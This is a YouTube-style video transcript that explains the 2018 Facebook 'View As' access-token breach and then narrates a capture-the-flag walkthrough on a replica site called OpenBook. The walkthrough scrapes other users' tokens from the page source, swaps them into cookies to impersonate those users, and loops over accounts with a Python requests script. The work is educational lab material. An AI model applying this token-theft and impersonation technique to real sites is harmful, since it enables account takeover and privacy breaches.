 What's up, everybody? My name is John Hammond, and in this video, I want to showcase a little bit of the Facebook hack that was discovered just last month. I want to discuss a little bit of the vulnerability, what was found, what kind of resulted from it, and then I want to showcase an ICTF or adversary capture the flag challenge that was released to kind of simulate and replicate honestly the vulnerability, the hack and the overall attack. So, I'm going to showcase some of the articles and some of the news releases that Facebook released themselves, and if you don't want to see that or you've already read it through it, feel free to skip on ahead to the actual code portion of this video, because it will be showcasing some of it. So, on September 28th, Facebook originally released an article discussing a security update as to what they found on their website infrastructure system, etc. So, they found a security issue affecting almost 50 million accounts, my own being part of them. And what they discovered was that attackers or hackers had found a vulnerability in Facebook's code that impacted the view as feature that lets people see what their own profile looks like as another individual or as another user on Facebook. So, they fixed the vulnerability, informed law enforcement, and the articles that they're releasing kind of explain, discuss, and showcase a little bit of what this really, really is. Personally, my own account was logged out of, and then logged back in, I personally had to log back in, so I knew that I was affected, and the view as feature has been removed because of this for the time being. The full attack took advantage of about three kind of different and distinct bugs or vulnerabilities that they were able or the original attackers and hackers were able to chain together to take advantage of this and at least log into or gain access to other accounts. So, they discussed the technical details on this original article, they released two articles here first on September 28th as we've discussed, and this is peculiar because it explains more of the technical information or how this attack really happened. So, the initial compromise was the view as feature, and it's supposed to be a view only interface, but one type of functionality or one implementation that allowed you to post stuff to Facebook. Specifically, the version that enables people to wish their friends happy birthday was kind of the golden ticket to actually finding out this vulnerability in this bug. The next bug or vulnerability they were able to take advantage of was the video uploader, and that was accidentally offering just in plain text HTML to the user, to the end user actually using this interface, the access token of the Facebook mobile application. So, the access token for any user that may be taking advantage of or using the Facebook mobile, like on your mobile phone, maybe Android or iOS or iPhone, etc. So, this essentially, if being able, being used with their authentication token, they were able to impersonate or become that other user, and that's how they received and were able to take advantage of another person's account. And Facebook is pretty upfront about this. They explained that the access token was literally available within just the HTML of the page. You had to simply view source and then you could track it down. Probably a peculiar thing to find and notice, but just a crucial thing. And honestly, looking at it, you know, in hindsight, what we could do as professional people, infosec and capture flag players, honestly, I think this is something that any one of us could do if you had that motivated attacker mindset. I don't think any of us do because we're not black cat hackers, but it's not like this is a extremely difficult attack or something to pull off. It is something interesting and very, very smart. So, I wanted to showcase it and maybe just kind of prove to you that this is how it's done. The cool thing about this is that just recently, Adversary, the group and organization that put on ICTF that I have other videos for actually release kind of an attack or a mission is what they call it. A module or kind of a training and testing environment to learn how this vulnerability and how this stuff is put together. So I want to showcase this. They include an article with it. Here I have it in this page. It's on their blog. And I think for the time being, it's just going to be on their front page because this happened just very recently. I saw this on Reddit just yesterday. So I want to showcase how it's really done. The article that they release kind of really just discusses everything that I've kind of already spoken about, kind of breezing through the other articles that Facebook released themselves. And it showcases, okay, you can change these vulnerabilities together and you can, it's obviously detectable. Like they found Facebook discovered this original attack vector through the amount of activity or the amount of people using, or not so much people, but the use of that view as functionality. And you can see again discussing the happy birthday functionality there. So their replicated challenge is interesting in that it tries to use this exact same exploit, at least at a high level, right? At a very distilled watered down portion of this attack and that you can set a birthday for yourself. You can view your account or view your profile as other users. And then you can take advantage of what looks like, I don't think it's a Java web token, but I think it is something close to it as the access token of the other user. So I just wanted to showcase their application called OpenBook. Again, just the training environment to just showcase and teach what this vulnerability was and how this attack really happened. They discussed this is prevalent in OWASP or the OpenWeb Association. Oh, I should look this up. I don't want to talk like a fool. Wikipedia says the Open Web Application Security Project, an online community that discusses web application security. So big thing. Cool. Let's jump into the code and actually showcasing this bug in the simulated distilled replica. So this is OpenBook. Actually, if you were to click on their article, it will bring you to adversaries kind of interface for it that we've seen in ICTF and they'll discuss it. They give us the link to actually like view the page on its own. So I've just got to open another tab here. So OpenBook. It is essentially a fake boilerplate social media like platform, right? Looks very similar to Facebook. And it's kind of the joke of OpenBook. We are logged in as supposedly John Johnson. I don't know those accents. Whatever. Let's ignore them. We have all of these other individuals or friends or users that we could message if we were to click on them. This italics message I think is just supposed to be some icon that isn't rendering, but whatever. So again, we click on each of these individuals. We could send a message, but that functionality doesn't seem to be really there. Just again, trying to showcase this proof of concept thing. If we wanted to, we could post a status, but that feature has been disabled while the possible breach is being investigated. That's perfectly fine. Creators of this kind of module didn't really need to implement that because it's just trying to showcase the vulnerability in the hack. We can see other people's statuses. Very, very interesting. But what we want to do is go check out our own user profile. So I'll click on a little picture of this individual, John Johnson. You can view your profile as any other individual. We want LarkUnderberg. That is kind of the target for this challenge. If I were to view the webpage as him, you can see my URL change just a bit. It added another get variable view as equals one, one being, I suppose, the ID of that account, but nothing has changed because we haven't set our birthday. So you can click on the settings button here and we can specify a birthday. The idea is to change your birthday to the current date. So right now, Wednesday, October 17th, for me, if we click on that, hit OK. It will go ahead and enter that as our birthday. If we submit this, now we'll have that new box down here where we can upload a birthday greeting, ideally to ourselves. But if we change the view as and switch to another user, we'll see a different access token in the HTML. So let's actually check out the HTML. You can right-click and hit View Page Source or just hit Control-U. And scroll down through this. A lot of junk, a lot of interesting things, right? But at the very, very bottom here, when we're seeing upload a birthday greeting, the Form Action with Upload specifies a token equals and then this seemingly garbage, however, we can assume this is a Java Web token or whatever the case may be, that is our unique cookie for our account. That's our individual account. But if we view this as another user, so if I change this to View as LarkUnderberg, now that my URL has changed, we are viewing the page as LarkUnderberg. If I view the source again, scroll down here, you can see that this token is just different from what the other one was. So I can go ahead and copy this if I wanted to. I'm going to use Edit This Cookie. That's the plugin that I've been using just in Google Chrome to change this token. And see, if I put them side-by-side, this token is different from the other because now we're using LarkUnderberg's token. I'll hit the check mark to save it. I will refresh and now I can see I am LarkUnderberg. Cool. So in the actual attack and the actual real Facebook hack, this wasn't showcasing messages, it was just showcasing message metadata. And adversary and the ICTF guys plainly state this as that in the real world it wasn't messages that you were able to take advantage of, but in this case we are. So if you click on one of the individuals that you were chatting with as LarkUnderberg, you can say, hey there, I want to tell you some secrets and you can get the flag or the catch the flag string of text or token or special key to denote that you have in fact exploited the vulnerability or taken advantage of it. So if you actually just view this in the source, you can see flag is happy birthday mark. So that was cool doing it by hand, but now I want to showcase this in code, right? So let's get to the very, very start. I will remove my cookie, refresh to get back to the original page, so I'm back to being John Johnson. So let's take this URL and let's work with a script that I have. I'm just going to use in Python, ape.py will be the name of my script. And let's say the URL can equal what we've pasted in. Let's import requests because I like to use the request module. It's just a little bit nicer than URL live in Python. So let's use a session object. I'll just call this s for convenience. And let's do s.get the URL. Now, once I've made that get request, I should just essentially be working with that page and the cookie should be created for me. So I can say print s.cookies and we'll just see if we've got anything. Yes, we do. We have our token created. So if I wanted to drill down and specify that one, I could index it just like kind of a dictionary here. I want to say the token and I've got that string. Okay. Now, let's go ahead and make the change to our birthday. So on the web page, we went to the settings page and we changed our birthday to 17th. I'm going to open up the developer tools. So I'm going to hit F12 just so I can see what this request really is. I'm going to refresh this and set 17 to OK. Hit submit. And it looks like this guy here. Can I see the full page of this, please? Cool. Just had to click it harder, apparently. Looks like it's making a post request to this link with the birth date being set as simply that string. So that works just fine. Let's go ahead and do that in code. I'll say s.post to this location with the birth date being this as our data. So data can equal a dictionary here, birth dates with a string of that text for the current date. And now if we were to get our page, let's just say r equals the response essentially for s.get, just this link. And then we can print r.text. Now we should see an upload function just that we've seen before because we have the upload a birthday greeting segment for that form that we've seen just as we were doing it on our web browser. So now we can change how we are viewing this page, right? We can say let's get as view as equals one just as we made that switch when we were actually viewing the page. Well, let me submit here. OK, cool. Yeah, view as equals one just in our URL. Simple get variable. So if I print this text now, the token that we're going to see inside the source here is not going to be our token. But as we've seen, it will be Larx token. So let's go ahead and carve that out just with regular expressions. Let's do re.findall token equals as much as we can probably until an ending quote here. Or I should have done a better job of actually seeing what it was that terminates the token here. Sure. Yeah, let's do the let code one. We'll get the second one. See if we get some find, some find. Sorry, we do. This one is greedy. So let's make this regular expression lazy with the question mark at the end. And I want to actually retrieve this and sorry, up until an ending quotation mark. Good. So now we can get either of these. Let's just grab the first one. And that is the token that we have now for Lark. So let's say Lark token can equal that and we will change our S cookies to actually be that value. So the best way that we can do that is actually by removing the original token that we have in our set of cookies here. And then let's go ahead and set a new cookie token being set to Larx token. And then we can get the page just as we've done before and just get our own profile. And let's see if we are now Lark under Berg. Oh, no, I broke something. You might have to keep the user ID in here. Okay, looks like I am viewing now as Lark under Berg. So our cookie looks like it's in place. Let's see if we can view the messages. I'm just going to grab that URL from the original page here. Five message this individual user ID equals three here. Let's try that print our text. Hey, are you there? I've got to tell you some secrets and we can read the flag out just like that. If we wanted to we can do re.findall flag curly braces everything inside of it with just our text here. Let's print that out and we get the flag. Let's make that lazy. Cool. So that is how we could get the flag. But let's say we wanted to be just like how the real world Facebook attack was where we wanted to loop through as many different user accounts as we could and get all of their different tokens. Well, right now I think we only have about a dozen or so user accounts. So let's I guess loop through 12 in this case. And in our case it's only setting that view as user with just a simple HTTP get variable. So it's not going to be a very hardcore interesting loop. But again, I wanted to showcase that is something that could be done. Let's go ahead and do that. Let's do for I in let's say just range 12. And I do want to keep one here because it's starting to view as one to begin with. And let's say that can be a decimal value and I so we're just doing some string formatting in Python. Make this an actual loop here. And let's say token can just be that and let's print out the token that we're receiving. So now I'm seeing a bunch of different tokens that we just scraped them all out. And if we wanted to we could associate them with another user to scrape out their name. And if we really wanted to we could impersonate any of those individuals and like see about their information. For the point of this this vulnerability showcase just this replicated simulated CTF challenge and distilled educational thing. There's not going to be other interesting information. So that's that that is how you can find the flag for this. And just showcasing how we could take advantage of it to really use that view as functionality and just iterate through other user accounts as many as we wanted to. If this open book application had the ability of the functionality to add friends. You could do this for however many friends you wanted to. And then once you've logged into their account check out their friends and that that's how it fans out that how that's how the attack spread it to however million people. And it's become a big big buzz in Facebook and in the infosec scene. So thank you guys so much for watching. I hope this has been kind of cool and kind of interesting. Hopefully seeing some of the code and seeing how this kind of works with a play pretend problem to like hack on has been kind of cool. And if you like some of this stuff please do check out some of my other videos I do a lot like this with a lot of catch the flag challenges. Hey before I go I do just want to give a quick shout out and thank you to all the people that support me on Patreon. Thank you guys so much. I cannot say this enough. I know I say it every video but it's still not enough. You guys are really what keeps me motivated and it just offered the support to keep me fighting through it and releasing cool stuff and interesting content that hopefully the you guys in the world or the whole Internet can consume. So thank you. One dollar a month on Patreon will give you a special shout out just like this at the end of every video. I know it's not a whole big crazy incentive. Hopefully it's just that feel good feeling like hey I'm helping a dude out you know just kind of putting food on the table or whatever we're going to do to get by so thank you for that. $5 or more on Patreon a month will give you early access to every video that are released on YouTube before it goes live. It's access to a special Google Drive folder that is kind of shared with everyone and that way you can see videos that are scheduled to be released on YouTube maybe a day in advance or whatever the case may be if I have a lot of content backed up and ready to go soon. Hey if you did like this video please do like comment and subscribe it really helps me grow. Please do join our Discord server link in the description it is a cool community full of other CTF players, programmers and hackers. You can hang out with me other cool people that are way smarter than me and it's just a really awesome community to plug yourself into the scene and to learn a little bit because that's what it's all about just learning and getting better. Thanks so much guys. Hope to see you on Patreon. Hope to see you in the next video. I love you. I'll see you later.